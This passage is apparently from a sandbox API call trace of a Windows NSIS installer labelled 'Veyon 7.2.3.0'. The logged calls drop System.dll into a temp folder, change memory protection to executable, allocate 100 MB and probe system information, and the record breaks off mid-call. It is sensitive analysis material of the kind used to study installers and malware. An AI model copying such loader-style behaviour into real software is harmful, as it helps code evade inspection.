hFile=0x1f0, lpBuffer=0x5b5b08, nNumberOfBytesToRead=0x7b00, lpNumberOfBytesRead=0x19fc94, lpOverlapped=0x0 | out: lpBuffer=0x5b5b08*, lpNumberOfBytesRead=0x19fc94*=0x7b00, lpOverlapped=0x0) returned 1 [0029.900] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76bc0000 [0029.900] GetProcAddress (hModule=0x76bc0000, lpProcName="GetUserDefaultUILanguage") returned 0x76bda6f0 [0029.900] GetUserDefaultUILanguage () returned 0x409 [0029.900] wsprintfA (in: param_1=0x42a000, param_2="%d" | out: param_1="1033") returned 4 [0029.900] wsprintfA (in: param_1=0x42a000, param_2="%d" | out: param_1="1033") returned 4 [0029.900] lstrcpynA (in: lpString1=0x422f20, lpString2="Veyon 7.2.3.0", iMaxLength=1024 | out: lpString1="Veyon 7.2.3.0") returned="Veyon 7.2.3.0" [0029.900] SetWindowTextA (hWnd=0x0, lpString="Veyon 7.2.3.0") returned 0 [0029.900] lstrcpynA (in: lpString1=0x5b5dcc, lpString2="Veyon Service", iMaxLength=1024 | out: lpString1="Veyon Service") returned="Veyon Service" [0029.900] lstrcpynA (in: lpString1=0x5b61e4, lpString2="Veyon Master", iMaxLength=1024 | out: lpString1="Veyon Master") returned="Veyon Master" [0029.900] lstrcpynA (in: lpString1=0x421138, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.900] lstrcpynA (in: lpString1=0x421138, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.900] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" [0029.900] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 36 [0029.900] lstrcpynA (in: lpString1=0x429400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0029.900] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x270087 [0029.902] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0029.902] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 36 [0029.902] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0029.902] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0029.902] GetLastError () returned 0xb7 [0029.902] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0029.902] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1" (normalized: "c:\\users\\ciihmn~1"), lpSecurityAttributes=0x0) returned 0 [0029.902] GetLastError () returned 0xb7 [0029.902] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1" (normalized: "c:\\users\\ciihmn~1")) returned 0x10 [0029.902] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData" (normalized: "c:\\users\\ciihmn~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0029.902] GetLastError () returned 0xb7 [0029.902] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData" (normalized: "c:\\users\\ciihmn~1\\appdata")) returned 0x12 [0029.902] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local" (normalized: "c:\\users\\ciihmn~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0029.903] GetLastError () returned 0xb7 [0029.903] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local" (normalized: "c:\\users\\ciihmn~1\\appdata\\local")) returned 0x10 [0029.903] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0029.903] GetLastError () returned 0xb7 [0029.903] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp")) returned 0x10 [0029.903] lstrcpynA (in: lpString1=0x429800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0029.903] SetCurrentDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp")) returned 1 [0029.903] lstrcpynA (in: lpString1=0x4226c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.903] lstrlenA (lpString="") returned 0 [0029.903] lstrcpynA (in: lpString1=0x409c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.903] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.903] lstrcmpiA (lpString1="", lpString2="") returned 0 [0029.903] lstrcpynA (in: lpString1=0x4226c0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.903] lstrlenA (lpString="") returned 0 [0029.903] lstrcpynA (in: lpString1=0x5cacf4, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.903] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\" [0029.903] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 36 [0029.903] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" [0029.903] GetTickCount () returned 0x1a14c [0029.903] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", lpPrefixString="nsm", uUnique=0x0, lpTempFileName=0x424000 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp")) returned 0xa14e [0029.904] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.904] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.904] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.904] lstrcpynA (in: lpString1=0x421138, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.904] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.904] FindFirstFileA (in: lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpFindFileData=0x421580 | out: lpFindFileData=0x421580) returned 0x59e2c8 [0029.904] FindClose (in: hFindFile=0x59e2c8 | out: hFindFile=0x59e2c8) returned 1 [0029.904] DeleteFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp")) returned 1 [0029.904] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.904] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.904] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.904] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0029.904] GetLastError () returned 0xb7 [0029.904] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0029.905] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1" (normalized: "c:\\users\\ciihmn~1"), lpSecurityAttributes=0x0) returned 0 [0029.905] GetLastError () returned 0xb7 [0029.905] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1" (normalized: "c:\\users\\ciihmn~1")) returned 0x10 [0029.905] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData" (normalized: "c:\\users\\ciihmn~1\\appdata"), lpSecurityAttributes=0x0) returned 0 [0029.905] GetLastError () returned 0xb7 [0029.905] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData" (normalized: "c:\\users\\ciihmn~1\\appdata")) returned 0x12 [0029.905] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local" (normalized: "c:\\users\\ciihmn~1\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0029.905] GetLastError () returned 0xb7 [0029.905] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local" (normalized: "c:\\users\\ciihmn~1\\appdata\\local")) returned 0x10 [0029.905] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0029.905] GetLastError () returned 0xb7 [0029.905] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp")) returned 0x10 [0029.905] GetModuleHandleA (lpModuleName="SHELL32") returned 0x74760000 [0029.905] GetProcAddress (hModule=0x74760000, lpProcName=0x2a8) returned 0x749ffa00 [0029.905] IsUserAnAdmin () returned 1 [0029.905] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp"), lpSecurityAttributes=0x19fa04) returned 1 [0029.906] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.906] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.906] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.906] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.906] lstrcpynA (in: lpString1=0x42a800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.906] lstrcpynA (in: lpString1=0x424000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.906] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.906] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.906] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.906] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.906] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0xffffffff [0029.906] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0029.906] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=67722, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1088a [0029.906] GetTickCount () returned 0x1a14c [0029.906] ReadFile (in: hFile=0x1f0, lpBuffer=0x19fbe0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x19fbe0*, lpNumberOfBytesRead=0x19fbc8*=0x4, lpOverlapped=0x0) returned 1 [0029.906] GetTickCount () returned 0x1a14c [0029.906] ReadFile (in: hFile=0x1f0, lpBuffer=0x4128d8, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesRead=0x19fbc8*=0x2c00, lpOverlapped=0x0) returned 1 [0029.906] WriteFile (in: hFile=0x214, lpBuffer=0x4128d8*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x4128d8*, lpNumberOfBytesWritten=0x19fbc8*=0x2c00, lpOverlapped=0x0) returned 1 [0029.907] CloseHandle (hObject=0x214) returned 1 [0029.908] lstrcpynA (in: lpString1=0x5cacf4, lpString2="* (&t256\x09)\x09\x09p \x09 \x09.r5 \x09 \x09", iMaxLength=1024 | out: lpString1="* (&t256\x09)\x09\x09p \x09 \x09.r5 \x09 \x09") returned="* (&t256\x09)\x09\x09p \x09 \x09.r5 \x09 \x09" [0029.908] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.908] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.908] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.908] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0029.908] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x0 [0029.908] LoadLibraryExA (lpLibFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", hFile=0x0, dwFlags=0x8) returned 0x10000000 [0029.916] VirtualProtect (in: lpAddress=0x1000404c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x1000403c | out: lpflOldProtect=0x1000403c*=0x4) returned 1 [0029.918] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0029.918] lstrcpyA (in: lpString1=0x5cc520, lpString2=" " | out: lpString1=" ") returned=" " [0029.918] lstrcpynA (in: lpString1=0x5cacf0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.918] lstrcpynA (in: lpString1=0x5cb908, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.919] lstrcpynA (in: lpString1=0x5cbd10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.919] lstrcpynA (in: lpString1=0x5cbd10, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.919] wsprintfA (in: param_1=0x5cbd10, param_2="%d" | out: param_1="5980936") returned 7 [0029.919] lstrcpyA (in: lpString1=0x425400, lpString2="5980936" | out: lpString1="5980936") returned="5980936" [0029.919] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.919] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.919] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.919] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0029.919] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0029.919] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.919] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.919] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.919] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.919] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0029.919] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0029.919] lstrcpynA (in: lpString1=0x5cacf4, lpString2="msvcrt::malloc(i 100000000) \x09 p .r5", iMaxLength=1024 | out: lpString1="msvcrt::malloc(i 100000000) \x09 p .r5") returned="msvcrt::malloc(i 100000000) \x09 p .r5" [0029.919] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0029.919] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0029.919] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0029.919] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0029.920] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0029.920] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0029.920] lstrcpyA (in: lpString1=0x5cbd10, lpString2="msvcrt" | out: lpString1="msvcrt") returned="msvcrt" [0029.920] lstrcpyA (in: lpString1=0x5cc120, lpString2="msvcrt" | out: lpString1="msvcrt") returned="msvcrt" [0029.920] lstrcpyA (in: lpString1=0x5cc520, lpString2="malloc" | out: lpString1="malloc") returned="malloc" [0029.920] GetModuleHandleA (lpModuleName="msvcrt") returned 0x75b80000 [0029.920] GetProcAddress (hModule=0x75b80000, lpProcName="malloc") returned 0x75bc78c0 [0029.920] lstrcpynA (in: lpString1=0x5cacf0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.046] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="100000000") returned 9 [0030.046] wsprintfA (in: param_1=0x5ca488, param_2="%d" | out: param_1="45285408") returned 8 [0030.047] lstrcpyA (in: lpString1=0x425400, lpString2="45285408" | out: lpString1="45285408") returned="45285408" [0030.047] FreeLibrary (hLibModule=0x100016bd) returned 0 [0030.047] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.047] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.047] lstrcpynA (in: lpString1=0x409c00, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.047] lstrcpynA (in: lpString1=0x40a000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0030.047] lstrcmpiA (lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", lpString2="") returned 1 [0030.047] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.047] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.047] lstrcpynA (in: lpString1=0x40a000, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.047] lstrcpynA (in: lpString1=0x409400, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.047] GetFileAttributesA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll")) returned 0x20 [0030.047] CreateFileA (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\nsma14e.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0xffffffff [0030.047] lstrcpynA (in: lpString1=0x5ca48c, lpString2="kernel32::GetSystemInfo(p\x09\x09 r5)", iMaxLength=1024 | out: lpString1="kernel32::GetSystemInfo(p\x09\x09 r5)") returned="kernel32::GetSystemInfo(p\x09\x09 r5)" [0030.047] lstrcpynA (in: lpString1=0x4226c0, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp" [0030.047] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp") returned 48 [0030.047] lstrcpynA (in: lpString1=0x409800, lpString2="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll" [0030.047] lstrcpynA (in: lpString1=0x409400, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0030.047] GetModuleHandleA (lpModuleName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\nsmA14E.tmp\\System.dll") returned 0x10000000 [0030.048] GetProcAddress (hModule=0x10000000, lpProcName="Call") returned 0x100016bd [0030.048] lstrcpyA (in: 